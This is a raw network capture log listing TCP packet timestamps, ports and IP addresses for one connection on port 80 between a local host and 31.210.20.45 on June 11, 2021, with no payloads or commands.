Jun 11, 2021 07:41:49.068909883 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068917036 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068968058 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068984985 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069056034 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069114923 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069175959 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069178104 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.069228888 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.069240093 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069300890 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069360971 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069417000 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.069418907 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069475889 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.069489956 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069561005 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069618940 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069674969 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.069679022 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069732904 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.069741964 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069864035 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.069931030 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070000887 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070008039 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070055962 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070065022 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070151091 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070219040 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070278883 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070285082 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070346117 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070338964 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070424080 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070482969 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070543051 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070553064 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070596933 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070605993 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070667028 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070724964 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070785046 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070786953 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070847034 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.070864916 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.070954084 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071011066 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071050882 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071244001 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071300983 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071350098 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071378946 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071393013 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071410894 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071434021 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071474075 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071513891 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071535110 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071551085 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071568012 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071590900 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071630001 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071677923 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071681023 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071723938 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071738005 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071763992 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071805000 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071844101 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071857929 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071883917 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071892023 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.071923971 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.071963072 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.072011948 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.072026968 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.072056055 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.072062016 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.085340977 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085396051 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085428953 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.085439920 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085480928 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085520983 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085537910 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.085567951 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.085568905 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085613012 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085650921 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.085736036 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125085115 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125148058 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125188112 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125226974 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125263929 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125284910 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125302076 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125318050 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125324011 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125341892 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125390053 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125396967 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125433922 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125473022 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125513077 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125540018 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125550985 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125571012 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125590086 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125631094 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125670910 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125696898 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125719070 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125762939 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125765085 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125802040 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125842094 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125870943 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125886917 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125910997 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.125926018 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.125966072 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126004934 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126032114 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126051903 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126068115 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126096964 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126135111 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126173973 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126197100 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126213074 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126235008 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126250982 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126291037 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126328945 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126354933 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126378059 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126384974 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126420975 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126458883 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126497984 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126522064 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126535892 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126552105 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126574039 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126614094 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126651049 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126674891 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126698971 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126707077 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126760006 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126805067 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126843929 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126885891 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126888990 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126910925 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.126923084 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.126961946 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127000093 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127019882 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127048969 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127065897 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127094030 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127171993 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127208948 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127240896 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127245903 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127258062 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127286911 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127324104 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127362967 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127389908 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127401114 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127427101 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127449036 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127490997 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127528906 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127552032 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127567053 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127585888 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127607107 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127644062 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127682924 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127717018 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127720118 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127739906 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.127768993 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127811909 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.127881050 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.138706923 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.138761997 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.138801098 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.138818979 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.138839960 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.138858080 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.138892889 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.138936996 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.138973951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139007092 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.139014006 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139053106 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139067888 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.139091969 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139111042 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.139163017 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139203072 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139239073 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139271975 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.139286995 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139290094 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.139329910 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139369965 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139409065 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139435053 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.139447927 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.139463902 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.144455910 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181282997 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181334019 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181371927 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181411028 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181448936 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181476116 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181485891 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181504965 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181525946 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181562901 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181585073 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181613922 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181657076 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181694984 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181734085 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181762934 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181773901 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181798935 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181808949 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181812048 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181853056 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181894064 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181911945 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181925058 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.181942940 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.181988001 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182024956 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182063103 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182065010 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182080984 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182102919 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182141066 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182179928 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182214975 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182219028 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182239056 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182269096 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182327032 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182364941 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182404041 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182442904 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182523966 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182533979 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182583094 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182612896 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182645082 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182683945 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182723045 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182760954 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182756901 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182789087 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.182799101 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182926893 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182966948 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.182996988 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183006048 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183017969 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183049917 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183088064 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183109045 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183155060 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183193922 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183248043 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183269024 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183284998 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183295965 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183325052 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183365107 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183381081 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183413029 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183456898 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183495998 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183516026 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183537960 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183542013 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183576107 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183614016 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183653116 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183670998 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183692932 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183706045 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183743000 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183785915 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183804035 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183824062 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183862925 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183902979 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183919907 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183939934 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.183955908 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.183979988 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184016943 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184065104 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184072971 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.184108973 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184118986 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.184146881 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184185982 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184223890 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184243917 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.184262991 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184272051 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.184300900 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184340000 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184356928 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.184387922 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184432030 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184468985 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184485912 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.184509993 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184526920 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.184549093 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184587955 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.184647083 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.275223970 CEST	49728	80	192.168.2.3	31.210.20.45
